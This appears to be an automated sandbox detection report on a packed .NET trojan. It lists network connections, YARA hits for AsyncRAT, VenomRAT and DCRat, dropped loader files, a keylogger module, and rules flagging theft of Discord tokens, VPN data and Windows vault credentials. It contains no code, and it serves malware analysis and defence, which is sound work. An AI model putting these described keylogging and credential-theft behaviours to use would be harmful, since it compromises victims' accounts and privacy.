Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61051
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61293
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61294
Source: unknown	Network traffic detected: HTTP traffic on port 61197 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61069 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61042
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61284
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61043
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61164
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61285
Source: unknown	Network traffic detected: HTTP traffic on port 61290 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61044
Source: unknown	Network traffic detected: HTTP traffic on port 61036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61239 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61286
Source: unknown	Network traffic detected: HTTP traffic on port 61311 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61287
Source: unknown	Network traffic detected: HTTP traffic on port 61185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61288
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61289
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61048
Source: unknown	Network traffic detected: HTTP traffic on port 61013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61049
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61180
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61181
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61182
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61062
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61183
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61184
Source: unknown	Network traffic detected: HTTP traffic on port 61322 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61092 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61262 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61053
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61295
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61175
Source: unknown	Network traffic detected: HTTP traffic on port 61217 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61296
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61055
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61176
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61297
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61177
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61298
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61178
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61299
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61059
Source: unknown	Network traffic detected: HTTP traffic on port 61163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61129 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61199 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61101 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61279 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61164 -> 443

Source: unknown	HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61013 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:61014 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61016 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61017 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61033 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61036 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61038 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:61040 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61044 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61063 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61065 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61071 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61079 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61096 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61110 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61113 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61116 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61120 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61131 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61132 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61134 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61136 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61137 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61139 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61140 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61142 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61145 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61146 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61149 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61153 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61164 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61174 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61176 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61177 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61180 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61183 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61184 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61186 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61187 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61189 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61190 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61192 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61193 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61194 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61195 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61199 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61201 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61201 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61203 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61205 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61207 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61209 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61211 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61213 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61216 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61217 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61218 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61220 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61221 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61223 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61225 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61226 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61227 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61228 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61229 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61231 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61232 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61233 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61234 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61236 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61243 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61244 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61245 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61247 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61248 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61251 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61252 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61255 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61256 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61258 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61259 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61260 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61262 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61266 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61271 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61273 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61274 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61278 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61279 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61282 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61286 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61289 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61291 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61292 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61293 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61295 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61297 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61298 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61299 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61300 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61301 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61302 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61304 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61306 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61307 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61309 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61310 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61311 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61312 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61313 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61316 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61317 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61319 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61320 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61321 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61322 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61324 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.Client.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Client.exe.26a68b0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe PID: 6176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Client.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Loader.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED

Yara detected VenomRAT

Source: Yara match	File source: 2.2.Client.exe.26a68b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Client.exe PID: 6152, type: MEMORYSTR

Contains functionality to log keystrokes (.Net Source)

Source: Client.exe.0.dr, Keylogger.cs	.Net Code: KeyboardLayout
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, Keylogger.cs	.Net Code: KeyboardLayout
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, Keylogger.cs	.Net Code: KeyboardLayout
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, Keylogger.cs	.Net Code: KeyboardLayout

Installs a global keyboard hook

Source: C:\Users\user\AppData\Roaming\Loader.exe

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Loader.exe

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 20.2.Loader.exe.1d000000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 2.0.Client.exe.350000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 2.2.Client.exe.26a68b0.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 20.2.Loader.exe.1d000000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 20.2.Loader.exe.1dc20000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 20.2.Loader.exe.1dc20000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 21.2.Loaader.exe.1d630000.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 21.2.Loaader.exe.1d630000.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 21.2.Loaader.exe.1d630000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 21.2.Loaader.exe.1d630000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 20.2.Loader.exe.1dc20000.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 20.2.Loader.exe.1dc20000.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 20.2.Loader.exe.1d160000.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 2.2.Client.exe.26a68b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 20.2.Loader.exe.1d160000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000014.00000002.2864018440.000000001DC20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000014.00000002.2864018440.000000001DC20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 00000014.00000002.2814130598.000000001D000000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
